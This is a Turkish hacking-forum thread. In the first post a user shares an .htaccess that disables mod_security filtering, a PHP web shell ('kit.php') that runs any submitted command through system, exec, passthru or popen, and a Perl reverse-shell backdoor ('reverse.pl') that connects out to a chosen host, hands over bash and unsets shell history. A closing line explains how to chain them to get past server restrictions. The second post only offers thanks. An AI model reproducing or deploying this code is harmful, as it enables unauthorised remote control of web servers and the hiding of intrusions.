Safe Mode Bypass

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek
    .htaccess
    <IfModule mod_security.c>
    	SecFilterEngine Off
    	SecFilterScanPOST Off
    	</IfModule>
    
    kit.php
    <html><head><title>AnonGhost Perl Connect Shell Priv8</title><link rel="shortcut icon" href="http://www14.0zz0.com/2014/06/04/21/396554394.png" type="image/x-icon" /><style type="text/css">
    body{ background-color: transparent !important; color: #009900; text-shadow:#000 0px 2px 7px;}      a{text-decoration:none; font-family: Tahoma, Geneva; color:#007700; padding:2px 2px;}      a:hover{color:#009900; text-shadow:#00ff00 0px 0px 3px;}	  .area { color: #00bb00; font-size: 9pt; text-shadow:#000000 0px 2px 7px; border: solid 0px #007700; background-color:transparent; box-shadow: 0px 0px 4px #009900;    padding: 3px;   -webkit-border-radius: 4px;   -moz-border-radius: 4px;   border-radius: 4px;   -webkit-box-shadow: rgb(0,119,0) 0px 0px 4px;   -moz-box-shadow: rgb(0,119,0) 0px 0px 4px; }	  input[type=submit]{ padding: 3px; color: #00770;  font-weight: bold; text-align: center;  text-shadow: 0 1px rgba(255, 255, 255, 0.3);  background: #aeaeae;  background-clip: padding-box;  border: 1px solid #284473;  border-bottom-color: #223b66;  border-radius: 4px;  cursor: pointer;  background-image:-webkit-linear-gradient(top, #eaeaea, #d0d0d0);  background-image: -moz-linear-gradient(top, #eaeaea, #d0d0d0);  background-image: -o-linear-gradient(top, #eaeaea, #d0d0d0);  background-image: linear-gradient(to bottom, #eaeaea, #d0d0d0);  -webkit-box-shadow: inset 0 1px rgba(255, 255, 255, 0.5), inset 0 0 7px rgba(255, 255, 255, 0.4), 0 1px 1px rgba(0, 0, 0, 0.15);  box-shadow: inset 0 1px rgba(255, 255, 255, 0.5), inset 0 0 7px rgba(255, 255, 255, 0.4), 0 1px 1px rgba(0, 0, 0, 0.15); } input[type=text]{ padding: 3px; color: #009900; text-shadow: #777777 0px 0px 3px; border: 1px solid #007700; background: transparent; box-shadow: 0px 0px 4px #007700;    padding: 3px;   -webkit-border-radius: 4px;   -moz-border-radius: 4px;   border-radius: 4px;   -webkit-box-shadow: rgb(85,85,85) 0px 0px 4px;   -moz-box-shadow: rgb(85,85,85) 0px 0px 4px;} input[type=submit]:hover, input[type=text]:hover{ color: #ffffff; text-shadow: #006600 0px 0px 4px; box-shadow: 0px 0px 4px #00dd00; border: 1px solid #00dd00;    padding: 3px;   -webkit-border-radius: 4px;   -moz-border-radius: 4px;   border-radius: 4px;   -webkit-box-shadow: rgba(0,119,0) 0px 0px 4px;   -moz-box-shadow: rgba(0,119,0) 0px 0px 4px;} select{ padding: 3px; width: 162px; color: #00aa00; text-shadow:#000 0px 2px 7px; border: 1px solid #007700; background: transparent; text-decoration: none; box-shadow: 0px 0px 4px #00aa00;  padding: 3px;   -webkit-border-radius: 4px;   -moz-border-radius: 4px;   border-radius: 4px;   -webkit-box-shadow: rgb(85, 85, 85) 0px 0px 4px;   -moz-box-shadow: rgb(85, 85, 85) 0px 0px 4px;} select:hover{ border: 1px solid #00dd00; box-shadow: 0px 0px 4px #00dd00;   padding: 3px;   -webkit-border-radius: 4px;   -moz-border-radius: 4px;   border-radius: 4px;   -webkit-box-shadow: rgba(0,119,0) 0px 0px 4px;   -moz-box-shadow: rgba(0,119,0) 0px 0px 4px;}   #commands{ margin-left: 350px; margin-right: 350px; } option{ color: #777777; }</style>
    <?php
    echo '<center><font color="#007700" face="Tahoma" style="font-size: 11pt">Usage: perl reverse.pl [ipmu] [Portmu]</font><br>';
    echo'<p align="center"> 
    <img border="0" ></p><font face="Geneva" align="center" size="2" color="#007700"> Coded By Mauritania Attacker </font><br>
    <form method=get action="'.$me.'">
    <textarea class="area" rows="13" name="S1" cols="70" >';
    
    if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){
    echo $_GET['execmethod']($_GET['command']);}
    if (strlen($_POST['command'])>1 && $_POST['execmethod']!="popen"){
    echo $_POST['execmethod']($_POST['command']);}
    
    if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){
    popen($_GET['command'],"r");}
    
    echo'</textarea>
    <p><center>If nothing work it means that perl is not enabled in this server :(</center></p>
    <p align="center"><strong>Command: perl reverse.pl yourIP Port</strong><input type=hidden name="vw" size="50" value="cmd"> <input type="text" name="command" size="43"> <select name=execmethod>
    <option value="system">System</option>  <option value="exec">Exec</option>  <option value="passthru">Passthru</option><option value="popen">popen</option>
    </select> <input type="submit" value="Execute">
    </p></form>';
    ?>
    
    
    reverse.pl
    
    use IO::Socket;
    $system  = '/bin/bash';
    $ARGC=@ARGV;
    print "AnonGhost BACK-CONNECT BACKDOOR\n\n";
    if ($ARGC!=2) {
       print "Usage: $0 [Host] [Port] \n\n";
       die "Ex: $0 127.0.0.1 2121 \n";
    }
    use Socket;
    use FileHandle;
    socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host :(\n";
    connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host :(\n";
    print "[*] Resolving HostName\n";
    print "[*] Connecting... $ARGV[0] \n";
    print "[*] Spawning Shell \n";
    print "[*] Connected to remote host \!/ \n";
    SOCKET->autoflush();
    open(STDIN, ">&SOCKET");
    open(STDOUT,">&SOCKET");
    open(STDERR,">&SOCKET");
    print "AnonGhost BACK-CONNECT BACKDOOR  \n\n";
    system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
    echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
    system($system);

    reverse.pl chmod 755 verin kit phpden perl aktif sunucularda bypass yapar


    insanları Silahsızlandırmak onları köleleştirmek için En iyi Yoldur.
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    WarHead
    WarHead's avatar
    Kayıt Tarihi: 15/Mart/2003
    Erkek

    Hoca yine sahne senin eline sağlık... 


    İŞ ARIYORUM.
Toplam Hit: 415 Toplam Mesaj: 2
perl php fonction bypass